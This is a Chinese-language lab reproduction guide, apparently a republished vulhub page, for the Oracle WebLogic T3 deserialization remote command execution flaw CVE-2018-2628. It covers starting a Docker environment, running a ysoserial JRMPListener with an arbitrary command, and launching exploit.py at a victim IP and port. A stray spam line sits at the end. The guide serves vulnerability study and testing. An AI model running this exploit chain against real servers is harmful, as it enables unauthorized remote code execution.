<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Weblogic WLS Core Components 反序列化命令執行漏洞(CVE-2018-2628)

    Path weblogic/CVE-2018-2628

    Oracle 2018年4月補丁中,修復了Weblogic Server WLS Core Components中出現的一個反序列化漏洞(CVE-2018-2628),該漏洞通過t3協議觸發,可導致未授權的用戶在遠程服務器執行任意命令。

    參考鏈接:

    漏洞環境

    執行如下命令啟動Weblogic 10.3.6.0:

    docker-compose up -d

    等待環境啟動(環境差異,有的機器可能等待的時間比較久),訪問http://your-ip:7001/console,初始化整個環境。

    漏洞復現

    首先下載ysoserial,并啟動一個JRMP Server:

    java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

    其中,[command]即為我想執行的命令,而[listen port]是JRMP Server監聽的端口。

    然后,使用exploit.py腳本,向目標Weblogic(http://your-ip:7001)發送數據包:

    python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

    其中,[victim ip][victim port]是目標weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路徑,[JRMPListener ip][JRMPListener port]第一步中啟動JRMP Server的IP地址和端口。[JRMPClient]是執行JRMPClient的類,可選的值是JRMPClientJRMPClient2

    exploit.py執行完成后,執行docker-compose exec weblogic bash進入容器中,可見/tmp/success已成功創建。

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类